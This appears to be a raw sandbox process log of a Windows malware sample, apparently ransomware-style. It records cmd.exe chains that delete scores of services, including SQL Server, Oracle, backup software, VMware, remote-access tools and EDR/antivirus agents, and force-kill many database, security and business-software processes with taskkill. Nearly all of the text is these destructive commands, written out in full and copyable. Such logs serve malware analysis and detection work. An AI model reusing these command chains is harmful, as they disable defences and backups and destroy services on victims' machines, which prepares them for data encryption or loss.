C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "XT800Service_Personal"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLSERVERAGENT4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLBrowser4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLFDLauncher4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLSERVER4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete QcSoftService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLServerOLAPService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete VMTools4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete VGAuthService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSDTC4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete TeamViewer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ReportServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RabbitMQ4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AHS SERVICE"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sense Shield Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SSMonitorService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdAppService13004⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLAgent$SQL20084⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSSQL$SQL20084⤵
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdTaskService13004⤵
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdUpgradeService13004⤵
-
C:\Windows\SysWOW64\sc.exesc delete VirboxWebServer4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete jhi_service4⤵
-
C:\Windows\SysWOW64\sc.exesc delete LMS4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FontCache3.0.0.0"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SSSyncService4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "DAService_TCP"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "eCard-TTransServer"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete eCardMPService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete EnergyDataService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete UI0Detect4⤵
-
C:\Windows\SysWOW64\sc.exesc delete K3MobileService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TCPIDDAService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete WebAttendServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete UIODetect4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "wanxiao-monitor"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VMAuthdService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VMUSBArbService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete VMwareHostd4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vm-agent"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OpenSSHd4⤵
-
C:\Windows\SysWOW64\sc.exesc delete eSightService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete apachezt4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Jenkins4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete secbizsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLTELEMETRY4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete smtpsvrJT4⤵
-
C:\Windows\SysWOW64\sc.exesc delete zyb_sync4⤵
-
C:\Windows\SysWOW64\sc.exesc delete 360EntHttpServer4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete 360EntSvc4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete NFWebServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete wampapache4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MSSEARCH4⤵
-
C:\Windows\SysWOW64\sc.exesc delete msftesql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete 360EntClientSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSMQ4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SyncBASE Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleMTSRecoveryService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleDBConcoleorcl4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VmAgentDaemon4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""3⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1ClrAgent4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1TNSListener4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleServiceORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete aspnet_state @sc delete Redis4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete JhTask4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete XT800Service_Personal4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MCService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete allpass_redisservice_port211604⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Flash Helper Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Kiwi Syslog Server"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UWS HiPriv Services"4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UWS LoPriv Services"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ftnlsv34⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ftnlses34⤵
-
C:\Windows\SysWOW64\sc.exesc delete FxService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UtilDev Web Server Pro"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdwks4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client Guard"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE FileTranS"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete wwbizsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete qemu-ga4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AlibabaProtect4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete kbasesrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MMRHookService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete KuaiYunTools4⤵
-
C:\Windows\SysWOW64\sc.exesc delete KMSELDI4⤵
-
C:\Windows\SysWOW64\sc.exesc delete btPanel4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Protect_2345Explorer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete 2345PicSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-agent4⤵
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-server4⤵
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-worker4⤵
-
C:\Windows\SysWOW64\sc.exesc delete QQCertificateService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete OracleRemExecService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSDaemon4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSUserSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSDownSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSStorageSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSDataProcSvr4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete GPSGatewaySvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSMediaSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSLoginSvr4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete GPSTomcat64⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSMysqld4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSFtpd4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1004⤵
-
C:\Windows\SysWOW64\sc.exesc delete IpOverUsbSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ZTEVdservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Zabbix Agent"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentAccelerator4⤵
-
C:\Windows\SysWOW64\sc.exesc delete bedbg4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecDeviceMediaService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecRPCService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentBrowser4⤵
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecJobEngine4⤵
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecManagementService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MDM4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TxQBService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Gailun_Downloader4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RemoteAssistService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete YunService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""3⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete REPLICA4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCATS4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete RTCAVMCU4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete RtcQms4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCMEETINGMCU4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCIMMCU4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCDATAMCU4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCCDR4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ProjectEventService164⤵
-
C:\Windows\SysWOW64\sc.exesc delete ProjectQueueService164⤵
-
C:\Windows\SysWOW64\sc.exesc delete SPAdminV44⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SPSearchHostController4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SPTimerV44⤵
-
C:\Windows\SysWOW64\sc.exesc delete SPTraceV44⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete c2wts4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ADWS4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoard574⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoardRCService574⤵
-
C:\Windows\SysWOW64\sc.exesc delete vsvnjobsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VisualSVNServer4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BestSyncSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete LPManager4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MediatekRegistryWriter4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RaAutoInstSrv_RT28704⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "FlexNet Licensing Service 64"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup104⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLANYs_sem54⤵
-
C:\Windows\SysWOW64\sc.exesc delete CASLicenceServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete semwebsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TbossSystem4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AppFabricCachingService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ProjectCalcService164⤵
-
C:\Windows\SysWOW64\sc.exesc delete ErpEnvSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OSearch164⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.DispatchService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.UpdateService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Config.WindowsService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.DataCenterService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.SchedulingService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Setup.InstallService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MysoftUpdate4⤵
-
C:\Windows\SysWOW64\sc.exesc delete edr_monitor4⤵
-
C:\Windows\SysWOW64\sc.exesc delete abs_deployer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete savsvc4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxMonitorService4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete CloudExchangeService4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSDS.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer_Service.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CasLicenceServer.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_w32.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_x64.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rdm.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRT.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRTPortable.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBox.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSVC.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBoxVM.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM abs_deployer.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_monitor.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfupdatemgr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ipc_proxy.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_agent.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_sec_plan.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfavsvc.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxMonitorService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchangeService.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & 